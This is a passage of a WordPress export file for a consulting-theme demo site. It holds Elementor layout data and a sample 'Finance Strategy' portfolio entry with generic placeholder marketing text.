costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"5a688754","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"8f83c9f","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"6eea0e82","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Finance Strategy</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/finance-strategy/</link>
		<pubDate>Fri, 11 Sep 2020 07:18:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=842</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>842</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:18:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:18:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[finance-strategy]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="finance"><![CDATA[finance]]></category>
		<category domain="portfolio_cat" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"3c1bcc97","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"269995a","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5abe166e","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1f4595df","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"3738a3a7","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"2a6a10f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"17d6ef46","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3ad8441","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"4c261373","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"71428679","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1e56f55c","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"4a101bc2","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"344e5a57","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"31ba8a7c","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"618b4571","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d286c1c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"772279c4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"683bd9c1","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"aa33dd1","elType":"section","settings":[],"elements":[{"id":"d137f07","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"887bc3e","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5178fe1","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"ff06e44","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"c1bad2d","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"0488e67","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c3fe960","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"c594320","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"c9b3439","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"2e11b44","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"3666d5a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"bd4b114","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"a76cda5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7a2a70c","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"9dc9ae8","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"165aa1e","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"6133d3d","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"5bd4005","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3281e41","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"3d5d74a","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"8e85e10","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"33923b0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"70e6e39","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"7f9a3a7","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1220]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[844]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[thumb_size]]></wp:meta_key>
		<wp:meta_value><![CDATA[double_w]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section